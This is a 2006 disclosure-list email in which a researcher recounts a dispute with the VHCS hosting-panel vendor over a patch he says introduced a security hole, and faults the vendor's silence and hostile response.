Date: Tue Feb  7 16:31:55 2006
From: roman at rs-labs.com (Roman Medina-Heigl Hernandez)
Subject: Re: VHCS Security Patch - 2006-02-05 --> Fake!

Hi,

Let's summary:
1.- You (as VHCS "vendor") publish a patch that when installed opens a
big security hole (as demonstrated in my former analysis).
2.- You didn't notify security mailing-lists (as a responsible vendor
would do if a new security bug has been identified and fixed, which is
what you are claiming).
3.- Someone (me), publicly reports it (with cc to you) (I already argued
why I decided to go public; read my former mail).
4.- You answer saying it has now been fixed but you didn't publish any
reference or info in the VHCS page.
5.- So a VHCS customer who downloaded the wrong patch (and does not
consult security mls/sites) won't notice any change in your original
announce and will be vulnerable indeed. You are not correctly informing
your users.
6.- I publicly ask you for a clarification about the real bug which was
supposed to have been fixed and you didn't answer. Anything to hide?
7.- I didn't get any response but an offending mail accusing me of
elevating alarm level at securitywizardry... Pathetic.

Sorry, but I don't believe in security through obscurity. Insulting
people reporting problems is not the solution. Acknowledging your own
errors and clarifying the situation is. VHCS users deserve an official
explanation. Is / isn't 2.4.7.1 really vulnerable to a new bug?

PS: I'm posting this to full-disclosure, as an example of how a vendor
response to a security issue should never be.

Cheers,
-Rom?n (aka the "stupid asshole" :-))